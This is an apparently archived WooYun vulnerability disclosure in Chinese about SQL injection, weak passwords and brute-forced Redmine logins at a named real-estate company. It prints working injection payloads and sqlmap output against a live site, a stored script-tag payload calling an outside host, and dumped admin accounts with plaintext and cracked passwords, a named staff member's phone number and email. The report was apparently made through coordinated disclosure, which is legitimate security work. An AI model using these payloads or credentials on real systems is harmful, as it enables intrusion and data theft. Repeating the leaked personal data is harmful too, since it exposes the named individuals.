当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168916

漏洞标题:华夏幸福基业股份有限公司多处问题打包

相关厂商:华夏幸福基业股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-17 15:44

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

rt.

详细说明:

华夏幸福基业股份有限公司:http://**.**.**.**
问题一:华夏幸福基业股份有限公司党委会分站存在sa权限SQL注射
http://**.**.**.**/

GET /content1page.aspx?rcode=l02&news_id=1226&rtext=%E7%89%A9%E4%B8%9A%E9%9B%86%E5%9B%A2%E7%AC%AC%E4%B8%80%E5%85%9A%E6%94%AF%E9%83%A8%E8%AE%A4%E7%9C%9F%E5%AD%A6%E4%B9%A0%E8%B4%AF%E5%BD%BB%E3%80%8A%E4%B8%AD%E5%9B%BD%E5%85%B1%E4%BA%A7%E5%85%9A%E5%BB%89%E6%B4%81%E8%87%AA%E5%BE%8B%E5%87%86%E5%88%99%E3%80%8B HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive


注入参数为rcode,多类型:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rcode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: rcode=l02' AND 1768=1768 AND 'JyhZ'='JyhZ&news_id=1226&rtext=%E7%89%A9%E4%B8%9A%E9%9B%86%E5%9B%A2%E7%AC%AC%E4%B8%80%E5%85%9A%E6%94%AF%E9%83%A8%E8%AE%A4%E7%9C%9F%E5%AD%A6%E4%B9%A0%E8%B4%AF%E5%BD%BB%E3%80%8A%E4%B8%AD%E5%9B%BD%E5%85%B1%E4%BA%A7%E5%85%9A%E5%BB%89%E6%B4%81%E8%87%AA%E5%BE%8B%E5%87%86%E5%88%99%E3%80%8B
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: rcode=l02' AND 8845=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8845=8845) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(112)+CHAR(113))) AND 'nlfz'='nlfz&news_id=1226&rtext=%E7%89%A9%E4%B8%9A%E9%9B%86%E5%9B%A2%E7%AC%AC%E4%B8%80%E5%85%9A%E6%94%AF%E9%83%A8%E8%AE%A4%E7%9C%9F%E5%AD%A6%E4%B9%A0%E8%B4%AF%E5%BD%BB%E3%80%8A%E4%B8%AD%E5%9B%BD%E5%85%B1%E4%BA%A7%E5%85%9A%E5%BB%89%E6%B4%81%E8%87%AA%E5%BE%8B%E5%87%86%E5%88%99%E3%80%8B
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: rcode=l02' AND 9193=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'ywii'='ywii&news_id=1226&rtext=%E7%89%A9%E4%B8%9A%E9%9B%86%E5%9B%A2%E7%AC%AC%E4%B8%80%E5%85%9A%E6%94%AF%E9%83%A8%E8%AE%A4%E7%9C%9F%E5%AD%A6%E4%B9%A0%E8%B4%AF%E5%BD%BB%E3%80%8A%E4%B8%AD%E5%9B%BD%E5%85%B1%E4%BA%A7%E5%85%9A%E5%BB%89%E6%B4%81%E8%87%AA%E5%BE%8B%E5%87%86%E5%88%99%E3%80%8B


10个库,且权限sa:

available databases [10]:
[*] dachang
[*] dachang_new
[*] dachang_new_all
[*] DaChangDataBase
[*] dangwei
[*] guan
[*] master
[*] model
[*] msdb
[*] tempdb
current database:    'dangwei'
current user:    'sa'


取到的一些敏感信息:

Database: dachang_new
Table: Admin_User
[1 entry]
+----+-------------------------------------------------------------------------------------+--------+-------------+---------------+---------+----------+------------------+----------+-----------+------------+--------------------+
| id | Email                                                                               | isLock | Mobile      | LastIP        | PopList | Position | AdminPwd         | RealName | AdminName | Department | LastLoginTime      |
+----+-------------------------------------------------------------------------------------+--------+-------------+---------------+---------+----------+------------------+----------+-----------+------------+--------------------+
| 1  | lihaixv@163.COM</title>"><scri</title>"><script src=http://**.**.**.**></script><!-- | 0      | 15931199830 | **.**.**.** | all     | <blank>  | e9db9c60c3e8aa94 | 总 管理员 李海旭 | admin     | 技术部        | 11 16 2011 11:01AM |
+----+-------------------------------------------------------------------------------------+--------+-------------+---------------+---------+----------+------------------+----------+-----------+------------+--------------------+
Database: dangwei
Table: sys_user
[3 entries]
+---------+-----------+-----------+-------------+---------------+-----------------+--------------------+-----------------------+
| user_id | user_flag | user_name | user_islock | user_password | user_logincount | user_creationdate  | user_lastactivitydate |
+---------+-----------+-----------+-------------+---------------+-----------------+--------------------+-----------------------+
| 1       | 1         | dwadmin   | unlock      | adm1n2010     | 37              | 03 28 2010 12:00AM | 07 22 2015 10:22AM    |
| 7       | 1         | liudapeng | unlock      | 338866        | 25              | 03 23 2011 12:00AM | 11 \xa02 2013 10:34AM |
| 8       | 1         | dangban   | unlock      | 2310316       | 24              | 08 20 2011 12:00AM | 04 29 2014 \xa03:02PM |
+---------+-----------+-----------+-------------+---------------+-----------------+--------------------+-----------------------+
Database: DaChangDataBase
Table: Admin_User
[1 entry]
+----+-------------------------------------------------------------------------------------+--------+-------------+---------------+---------+----------+------------------+----------+-----------+------------+--------------------------+
| id | Email                                                                               | isLock | Mobile      | LastIP        | PopList | Position | AdminPwd         | RealName | AdminName | Department | LastLoginTime            |
+----+-------------------------------------------------------------------------------------+--------+-------------+---------------+---------+----------+------------------+----------+-----------+------------+--------------------------+
| 1  | lihaixv@163.COM</title>"><scri</title>"><script src=http://**.**.**.**></script><!-- | 0      | 15931199830 | **.**.**.** | all     | <blank>  | e9db9c60c3e8aa94 | 总 管理员 李海旭 | admin     | 技术部        | 05 \xa06 2015 \xa03:58PM |
+----+-------------------------------------------------------------------------------------+--------+-------------+---------------+---------+----------+------------------+----------+-----------+------------+--------------------------+


破解后的密码是1qaz2wsx,弱口令吧。
问题二:华夏网络营销平台后台管理系统自动填充账号且弱口令
http://**.**.**.**:5000

5.png


不多说了,上几张图,贵厂懂:

1.png


2.png


3.png


4.png


问题三:remine弱口令
用top500爆破到三个,密码均是123456,但我猜不止这三个吧:

7.png


6.png


是不是贵厂的OA啊mail啊也会有大量的弱口令呢?

漏洞证明:

已证。

修复方案:

仔细排查,加强过滤,员工意识,提高重视。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-20 16:10

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无